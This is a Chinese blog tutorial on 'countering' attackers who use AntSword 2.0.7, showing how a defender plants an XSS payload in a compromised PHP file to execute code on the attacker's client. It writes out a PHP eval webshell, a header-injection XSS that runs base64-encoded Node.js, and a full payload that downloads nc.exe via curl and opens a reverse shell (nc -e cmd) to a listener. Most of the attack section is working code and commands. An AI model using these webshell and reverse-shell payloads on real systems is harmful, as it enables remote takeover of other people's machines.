当前位置: 首页 > news >正文

反制攻击者-蚁剑低版本

目录

安装

攻击者获取防守方的权限

防守方反制攻击者

防守方获取攻击者的shell权限


安装

安装蚁剑2.0.7版本

链接:https://pan.baidu.com/s/1t40UxkZ2XuSWG6VCdGzvDw?pwd=8888

提取码:8888

下载好后先打开Loader文件夹下的.exe文件,打开后会要求载入文件

然后选中这个antSword-2.0.7载入,重启刚刚的.exe文件,就可以使用了

攻击者获取防守方的权限

【注意】:我这里演示的虚拟机为防守方,物理机为攻击方(两台都是windows系统)

在虚拟机中,使用phpstudy或者phpenv工具搭建一个php站点,站点下只需放入一个1.php文件

1.php文件中写入一句话木马

<?php eval($_REQUEST[6]); ?> 

在物理机中,能访问到该站点下的1.php文件

尝试使用刚刚下载的2.0.7版本的蚁剑进行连接,能够连接受害主机

防守方反制攻击者

在实际场景中,防守方被上传了一句话木马,从而被攻击者控制。

防守方可以在木马文件中写入一些xss代码,入侵者重新连接webshell时,就会触发xss。

防守方修改1.php文件内容,尝试弹窗

<?php header('HTTP/1.1 500 <img src=# onerror=alert(1)>'); ?>

在物理机中,双击蚁剑刚刚建立的连接

弹窗代码成功执行

防守方再次修改1.php文件内容

<?PHPheader("HTTP/1.1 500 Not \<img src=# onerror='eval(new Buffer(`Y29uc3QgeyBleGVjIH0gPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJyk7CmV4ZWMoJ2NhbGMnKTs=`,`base64`).toString())'>");?>

上面的代码中包含了一段base64编码的内容,我们解码出来看看

发现执行了一个node.js脚本,exec()函数会创建一个新的子进程来运行'calc'命令,从而弹出计算器

const { exec } = require('child_process'); 
exec('calc'); 

再次双击刚刚蚁剑建立的连接,弹出了计算器

防守方获取攻击者的shell权限

我们有没有什么办法获取攻击者的shell权限呢?答案是可以的

先新建一个文件夹,里面放入一个nc.exe文件

nc工具下载链接:https://pan.baidu.com/s/1EJT_8kZ2FbDmdE-w6TSXMA?pwd=8888

提取码:8888

在这个放有nc.exe程序的目录下打开终端,开启一个http服务:python -m http.server

访问页面http://防守方ip:8000

发现创建了一个站点,并且该站点下有一个nc.exe文件可以下载

在防守方开启一个监听,监听8888端口:nc -lvp 8888

接下来构造获取攻击者权限的php代码

下面这个命令表示从刚刚构造的站点下载nc.exe文件,并且通过nc命令进行反弹shell的操作(注意把ip替换成自己的防守方ip):

curl -o nc.exe http://192.168.47.148:8000/nc.exe & nc -e cmd 192.168.47.148 8888

我们把上面这个代码放到刚刚弹计算器的代码中:

const { exec } = require('child_process');
exec('curl -o nc.exe http://192.168.47.148:8000/nc.exe & nc -e cmd 192.168.47.148 8888');

对上面的代码base64编码:

Y29uc3QgeyBleGVjIH0gPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJyk7CmV4ZWMoJ2N1cmwgLW8gbmMuZXhlIGh0dHA6Ly8xOTIuMTY4LjQ3LjE0ODo4MDAwL25jLmV4ZSAmIG5jIC1lIGNtZCAxOTIuMTY4LjQ3LjE0OCA4ODg4Jyk7

放到前面php代码的Buffer中,保存该php文件:

<?PHPheader("HTTP/1.1 500 Not \<img src=# onerror='eval(new Buffer(`Y29uc3QgeyBleGVjIH0gPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJyk7CmV4ZWMoJ2N1cmwgLW8gbmMuZXhlIGh0dHA6Ly8xOTIuMTY4LjQ3LjE0ODo4MDAwL25jLmV4ZSAmIG5jIC1lIGNtZCAxOTIuMTY4LjQ3LjE0OCA4ODg4Jyk7`,`base64`).toString())'>");
?>

当攻击者再次尝试通过蚁剑访问时,会触发php代码里面的内容

防守方监听到攻击者触发了反弹shell的代码,从而获取攻击者的shell权限

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 腾讯OCR签名算法
  • EDI是什么:EDI系统功能介绍
  • Depth Anything——强大的单目深度估计模型
  • 北京崇文门中医院贾英才主任解读头晕:症状与根源
  • [Unity] ShaderGraph实现DeBuff污染 溶解叠加效果
  • 数据结构初阶(c语言)-排序算法
  • idea插件反编译class文件
  • 前端HTML+CSS查漏补缺——仿制百度搜索首页的一些思考
  • C#中多线程编程中的同步、异步、串行、并行及并发及死锁
  • <数据集>航拍车辆识别数据集<目标检测>
  • RocketMQ Dashboard安装
  • 逻辑推理复杂推理能力评估之baseline详解(Datawhale AI 夏令营)
  • C++ 微积分 - 求导 - 解析法(符号计算)
  • Laravel为什么会成为最优雅的PHP框架?
  • B - 02-计算球的体积 51Nod - 3266
  • IE9 : DOM Exception: INVALID_CHARACTER_ERR (5)
  • JavaScript 如何正确处理 Unicode 编码问题!
  • java8-模拟hadoop
  • js中的正则表达式入门
  • 持续集成与持续部署宝典Part 2:创建持续集成流水线
  • 数据仓库的几种建模方法
  • 1.Ext JS 建立web开发工程
  • Mac 上flink的安装与启动
  • #define、const、typedef的差别
  • #我与Java虚拟机的故事#连载04:一本让自己没面子的书
  • (16)UiBot:智能化软件机器人(以头歌抓取课程数据为例)
  • (C)一些题4
  • (二)丶RabbitMQ的六大核心
  • (分享)自己整理的一些简单awk实用语句
  • (附源码)python房屋租赁管理系统 毕业设计 745613
  • (附源码)spring boot北京冬奥会志愿者报名系统 毕业设计 150947
  • (附源码)springboot 房产中介系统 毕业设计 312341
  • (附源码)计算机毕业设计高校学生选课系统
  • (四)Android布局类型(线性布局LinearLayout)
  • (转)甲方乙方——赵民谈找工作
  • (转)自己动手搭建Nginx+memcache+xdebug+php运行环境绿色版 For windows版
  • (转载)VS2010/MFC编程入门之三十四(菜单:VS2010菜单资源详解)
  • *算法训练(leetcode)第三十九天 | 115. 不同的子序列、583. 两个字符串的删除操作、72. 编辑距离
  • .360、.halo勒索病毒的最新威胁:如何恢复您的数据?
  • .bat批处理(七):PC端从手机内复制文件到本地
  • .Net Attribute详解(上)-Attribute本质以及一个简单示例
  • .net CHARTING图表控件下载地址
  • .NET CORE 第一节 创建基本的 asp.net core
  • .NET MAUI Sqlite数据库操作(二)异步初始化方法
  • .NET 应用启用与禁用自动生成绑定重定向 (bindingRedirect),解决不同版本 dll 的依赖问题
  • .NET/C# 利用 Walterlv.WeakEvents 高性能地中转一个自定义的弱事件(可让任意 CLR 事件成为弱事件)
  • .Net下的签名与混淆
  • .NET正则基础之——正则委托
  • @autowired注解作用_Spring Boot进阶教程——注解大全(建议收藏!)
  • @Bean注解详解
  • [ 云计算 | AWS ] 对比分析:Amazon SNS 与 SQS 消息服务的异同与选择
  • [ACTF2020 新生赛]Include
  • [CF703D]Mishka and Interesting sum/[BZOJ5476]位运算
  • [codevs 2822] 爱在心中 【tarjan 算法】
  • [DM复习]关联规则挖掘(下)